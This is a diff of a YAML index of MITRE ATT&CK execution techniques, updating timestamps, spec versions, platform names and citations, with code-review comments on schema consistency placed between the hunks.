Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
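Review bot: x_mitre_permissions_required (User, Administrator, SYSTEM) is removed from T1059.007 in this hunk and nothing carries that information forward; if the markdown generator renders a Permissions Required field from this key, the T1059.007 page will lose it, so check the template. Two smaller points: revoked: false, x_mitre_deprecated: false and x_mitre_remote_support: false are new keys that any consumer iterating over technique fields should tolerate, and the source_name 'JScrip May 2018' is a misspelling inherited from upstream that must stay as-is, because citation keys match on the exact string.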
@@ -25262,9 +25582,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -25356,20 +25675,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -25397,7 +25715,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -25417,33 +25735,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25460,6 +25758,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -25470,9 +25769,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -25480,8 +25783,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
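Review bot: T1053.003 keeps x_mitre_permissions_required (- User) as unchanged context at the top of this hunk, whereas the same key is removed from T1059.007 and T1569.001 elsewhere in this patch. If upstream dropped the field for some objects and not others that is just the data, but if the generator is meant to strip it, this one was missed; either way the index should not end up with the key present for some techniques and absent for others unless that is intended.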
@@ -25521,7 +25840,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
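Review bot: the modified timestamp for T1559.001 goes backwards, from 2022-04-25T14:00:00.188Z to 2021-07-26T22:51:20.448Z, and T1059.008 further down shows the same pattern (2022-05-11 to 2022-04-19). That only makes sense if the index is now generated from a different upstream bundle than before; confirm that this is intended, and check that nothing downstream uses a later modified date to decide that a technique has changed, since these objects will now look older than they did in the previous index.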
@@ -25546,12 +25865,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
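Review bot: T1559.001 loses both spec_version and x_mitre_attack_spec_version: 2.1.0 in this hunk and gains no replacement, so within the hunks shown it is the only object that ends up with no x_mitre_attack_spec_version at all (T1047, T1053 and the rest keep 3.2.0, T1059.008 keeps 2.1.0). If the generator emits the key only when upstream provides it, fine, but a consumer that assumes the key is always present will break on this object.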
@@ -25631,11 +25948,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25695,12 +26011,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25798,9 +26113,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25817,19 +26132,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -25838,7 +26152,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25875,11 +26189,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25916,11 +26229,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
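Review bot: the platform list for T1059.009 changes from Azure AD, Office 365 and Google Workspace to Office Suite and Identity Provider (the same change is applied to T1059 further down). Any artifact keyed on platform names, such as per-platform index files or matrix filters, needs to know the new names, otherwise cloud techniques silently disappear from the old platform views; confirm the generator's platform list was updated together with this regeneration.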
@@ -25939,13 +26251,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -26024,12 +26335,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -26040,6 +26350,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -26050,16 +26361,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -26090,14 +26401,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -26163,39 +26471,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -26204,6 +26486,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -26216,19 +26499,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
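Review bot: `x_mitre_permissions_required` (User, root) and `spec_version: '2.1'` are dropped from T1569.001 with no replacement key, while the rest of the object is rebuilt around `x_mitre_attack_spec_version: 3.2.0`. If any consumer of this index still reads `x_mitre_permissions_required`, that is a silent schema change and should be stated in the commit message or generator notes. The reordering itself (`x_mitre_platforms`, `external_references` with the added `Launchctl Man` entry, `revoked: false`) is consistent with the other regenerated objects in this diff.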
@@ -26271,7 +26577,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
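Review bot: the `modified` timestamp for Network Device CLI moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-19T20:28:09.848Z'`. The old value shares the exact `14:00:00.188Z` time with several other entries removed in this diff, so it reads like a batch stamp and the new value like the upstream object's real timestamp, but confirm the source bundle is not older than the one previously indexed before merging.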
@@ -26287,72 +26593,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
